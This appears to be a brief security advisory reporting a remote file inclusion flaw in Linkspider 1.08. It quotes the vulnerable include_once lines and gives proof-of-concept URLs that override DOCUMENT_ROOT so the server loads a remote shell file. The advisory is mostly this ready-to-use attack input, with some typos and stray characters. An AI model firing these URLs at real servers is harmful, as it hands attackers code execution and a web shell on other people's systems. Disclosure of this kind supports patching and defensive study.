Linkspider version 1.08 suffers from a remote file inclusion vulnerability.
51828669489198e3979f8d74803897462b14d45e25be12672b3d1dd200936ef8
=============================================================
Linkspider v.1.08 Remote File Include Vulnerability
==============================================================
App Name : Linkspider v.1.08
HomePage : http://www.phoenix.frihost.net/linkspider/read_me.php
Vulnerability Discovered by : Rohit Bansal
Vuln Code:
----------------
links.php
include_once ($_SERVER['DOCUMENT_ROOT'] . "/linkspider/admin/custom.php");
also in
links.inc.php
include_once ($_SERVER['DOCUMENT_ROOT'] . "/linkspider/admin/custom.php");
POC:
---------------
htttp://site.com/[path]/links.php?_SERVER[DOCUMENT_ROOT]=SHELL.txt<http://site.com/%5Bpath%5D/links.php?_SERVER%5BDOCUMENT_ROOT%5D=SHELL.txt>
??
htttp://site.com/[path]/links.inc.php?_SERVER[DOCUMENT_ROOT]=SHELL.txt<http://site.com/%5Bpath%5D/links.inc.php?_SERVER%5BDOCUMENT_ROOT%5D=SHELL.txt>
??
rohitisback[at]gmail.com
================================================================
<http://gmail.com>